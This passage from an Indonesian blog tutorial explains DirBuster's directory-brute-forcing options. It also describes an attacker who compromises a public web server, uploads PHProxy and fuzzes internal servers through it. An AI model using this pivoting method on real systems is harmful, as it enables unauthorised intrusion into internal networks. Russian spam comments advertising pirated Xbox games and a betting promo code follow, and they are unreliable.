Pilihan lain yang harus dipilih adalah starting options, yaitu di mana titik mulainya DirBuster mencari direktori. Pilihannya adalah standard start point, atau URL Fuzz. Standard start point adalah pilihan yang paling banyak digunakan karena pilihan ini berarti kita meminta DirBuster untuk menggunakan nama direktori sebagai titik awal.
Pilihan yang ada ketika kita memilih Standard Start Point adalah checkbox Brute Force Dirs yang bisa dimatikan bila kita tidak ingin ingin membrute Direktori. Brute Force Files bisa dimatikan bila kita tidak ingin mencari file. Dua pilihan tersebut bisa diatur sesuai kebutuhan, apakah ingin mencari direktori dan nama file, atau direktori saja, atau nama file saja.
Pilihan File extention bisa diisi dengan ekstensi file yang ingin dicari, misalnya bisa kita isi dengan php, zip, gz, tar.gz. Namun bila kita tidak ingin menggunakan ekstensi, kita bisa centang pilihan Use Blank Extention.
Pilihan Be Recursive digunakan untuk membuat DirBuster melakukan pencarian secara mendalam (Deep First Search), yaitu mencari subdirektori dalam sebuah direktori, mencari sub-subdirektori dalam subdirektori dan seterusnya sampai kedalaman tertentu.
Ada kalanya kita harus membrute force nama direktori yang merupakan bagian dari parameter URL. Dalam kasus seperti itu kita bisa memakai pilihan URL Fuzz. Salah satu contoh kasusnya adalah ketika kita ingin melakukan scanning melalui sebuah web based proxy seperti PHPProxy.
Ketika kita ingin scanning website internal dengan IP address private dari website public yang sudah berhasil kita susupi, kita bisa gunakan PHProxy. URL PHProxy biasanya berbentuk http://somewebsite/myproxy/?q=http://situstarget/{dir}. Dalam kasus seperti ini, pilihan URL Fuzz bisa sangat berguna. Gambar di bawah ini menunjukkan skenario tersebut. Setelah seorang hacker berhasil menguasai web server public, dia akan mengupload web based proxy seperti PHProxy. Dengan proxy tersebut hacker bisa melebarkan serangannya ke arah dalam dengan menyerang web server internal yang tidak bisa dijangkau dari internet.
Walaupun tools ini sangat sederhana, tapi jangan remehkan keampuhannya. Silakan coba saja sendiri, mungkin nanti anda akan terkejut melihat banyaknya webmaster yang sembrono menaruh file/direktori sensitif di websitenya.

2 komentar:

  1. Консоли от компании Microsoft не сразу завоевали всемирную популярность и доверие игроков. 1-ая консоль под названием Xbox, вышедшая в далеком 2001 году, существенно уступала PlayStation 2 по количеству проданных приставок. Однако все изменилось с выходом Xbox 360 - консоли седьмого поколения, которая стала по-настоящему "народной" для жителей Рф и государств СНГ - http://ru-xbox.ru/load/1/1/3. Портал Ru-Xbox.Ru является популярным ресурсом в числе поклонников приставки, так как он предлагает игры для Xbox 360, которые поддерживают все имеющиеся версии прошивок - совершенно бесплатно! Для чего играть на оригинальном железе, если имеется эмуляторы? Для Xbox 360 игры выходили долгое время и представлены как посредственными проектами, так и хитами, многие из которых даже сегодня остаются эксклюзивными для это консоли. Некие гости, желающие сыграть в игры для Xbox 360, смогут задать вопрос: зачем нужны игры для прошитых Xbox 360 freeboot или разными версиями LT, в случае если имеется эмулятор? Рабочий эмулятор Xbox 360 хоть и существует, однако он просит производительного ПК, для покупки которого будет нужно вложить существенную сумму. К тому же, различные артефакты в виде исчезающих текстур, отсутствия некоторых графических эффектов и освещения - могут изрядно попортить впечатления об игре и отбить желание для ее предстоящего прохождения. Что предлагает этот интернет-сайт? Наш сайт на сто процентов приурочен к играм для приставки Xbox 360. У нас вы можете совсем бесплатно и без регистрации загрузить игры на Xbox 360 через torrent для следующих версий прошивок консоли: - FreeBoot; - LT 3.0; - LT 2.0; - LT 1.9. Каждая прошивка имеет свои особенности обхода интегрированной защиты. Поэтому, для запуска той или другой игры потребуется скачать специальную ее версию, которая стопроцентно приспособлена под одну из четырех вышеперечисленных прошивок. На нашем веб-сайте вы можете без труда подобрать желаемый проект под подходящую прошивку, так как возле каждой игры присутствует заглавие версии (FreeBoot, LT 3.0/2.0/1.9), под которую она приспособлена. Пользователям данного ресурса доступна особая категория игр для 360-го, созданных для Kinect - специального дополнения, которое считывает все движения 1-го либо нескольких игроков, и позволяет управлять с помощью их компьютерными персонажами. Большой выбор ПО Кроме способности загрузить игры на Xbox 360 Freeboot либо LT различных версий, здесь можно найти программное обеспечение для консоли от Майкрософт: - всевозможные версии Dashboard, которые позволяют кастомизировать интерфейс консоли под свои нужды, сделав его более удобным и современным; - браузеры; - просмотрщики файлов; - сохранения для игр; - темы для консоли; - программы, для конвертации образов и записи их на диск. Помимо вышеперечисленного игры на Xbox 360 Freeboot можно запускать не с дисковых, а с USB и других носителей, используя программу x360key, которую можно достать на нашем интернет-сайте. Посетителям доступно множество нужных статей, а помимо этого форум, где вы можете пообщаться с единомышленниками либо попросить совета у более опытнейших хозяев консоли.

    BalasHapus
  2. БК MelBet пользуется большой известностью на российском рынке: -Деятельность компании лицензирована; - Пользователям предоставлен впечатляющий перечень ставок - в формате live и предматчевых; - Здесь нет задержек с выплатами. Линия ставок неописуемо привлекательна. Для того, чтобы получить прибыльный бонус на совершение ставок, требуется всего лишь использовать промокод MelBet RS777. Получить промокод вы можете на ставку либо на депозит. Каждое предложение имеет свои особенности отыгрыша - рабочий промокод MelBet на сегодня.

    BalasHapus